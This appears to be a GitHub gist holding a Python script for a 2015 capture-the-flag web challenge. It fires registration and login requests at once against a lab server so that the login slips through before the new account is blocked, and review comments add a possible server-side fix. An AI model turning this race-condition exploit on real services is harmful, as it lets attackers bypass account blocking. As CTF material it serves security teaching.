@mrexcessive
Created October 4, 2015 17:01
Exploit register and login web service using timing attack for DCTFU CTF 2015 web 300 challenge
#!/usr/bin/python
#See article on https://whitehatters.academy/
#target server http://10.13.37.4 (on VPN for DCTFU 2015 quals CTF)
import requests # see http://stackoverflow.com/questions/4476373/simple-url-get-post-function-in-python
import multiprocessing # see http://stackoverflow.com/questions/6286235/multiple-threads-in-python
# we need to run register.php and login.php at the same time
# Root URL of the CTF service; the endpoint file names are appended to it,
# so the trailing slash matters.
baseurl = "http://10.13.37.4/"

# Throw-away account used for the challenge.
username = "blobbyD"
password = "goblob"

# register.php is sent this hex digest in its password field, while login.php
# is sent the plaintext above. Per the author this is the md5sum of that
# plaintext (not re-computed here).
# NOTE(review): presumably the service compares an unsalted MD5 of the login
# password against the stored value; server code is not shown, so confirm.
md5pwd = "476b56907764207c05e118caaf9f9d96"
# then need to fire up register, fire up login immediately
# capture output from both
def DoRegister():
    """POST the registration form to register.php and print the reply.

    Sends the module-level ``username`` together with ``md5pwd`` in the
    password field, then writes the response body to stdout tagged
    ``REGISTER:`` so it can be told apart from the login output.
    """
    form = {
        'username' : username,
        'password' : md5pwd,
    }
    response = requests.post(baseurl + "register.php", data=form)
    # A parenthesised single-argument print gives the same output on
    # Python 2 (which the original targets) and Python 3.
    print("REGISTER:[%s]" % response.text)
def DoLogin():
    """POST the login form to login.php and print the reply.

    Sends the module-level ``username`` with the plaintext ``password``
    (not the digest used at registration), then writes the response body
    to stdout tagged ``LOGIN:``.
    """
    form = {
        'username' : username,
        'password' : password,
    }
    response = requests.post(baseurl + "login.php", data=form)
    # A parenthesised single-argument print gives the same output on
    # Python 2 (which the original targets) and Python 3.
    print("LOGIN:[%s]" % response.text)
if __name__ == "__main__":
    # Disabled branch, kept as a record: register, then log in, one after
    # the other. The captured output below shows the login reply reporting
    # the user as automatically blocked.
    if False:
        DoRegister()
        DoLogin()
        SEQUENTIAL_FAILS="""
REGISTER:[ <h2>Congrats! Login now!</h2>
]
LOGIN:[ <h1>Logged in as </h1>Your user was automatically blocked]
"""

    # Active branch: issue both requests from separate processes so that
    # they are in flight at the same time.
    # NOTE(review): the page calls this a timing attack; what the code
    # exercises is a race between two requests, not a timing side channel.
    # If the service creates the account and applies the block in separate
    # steps, performing both in one transaction (or creating the account
    # already blocked) would close that window. The server code is not
    # shown here, so confirm against it.
    if True: # simultaneous - timing attack
        workers = [
            multiprocessing.Process(target=action)
            for action in (DoRegister, DoLogin)
        ]
        for worker in workers:
            worker.start()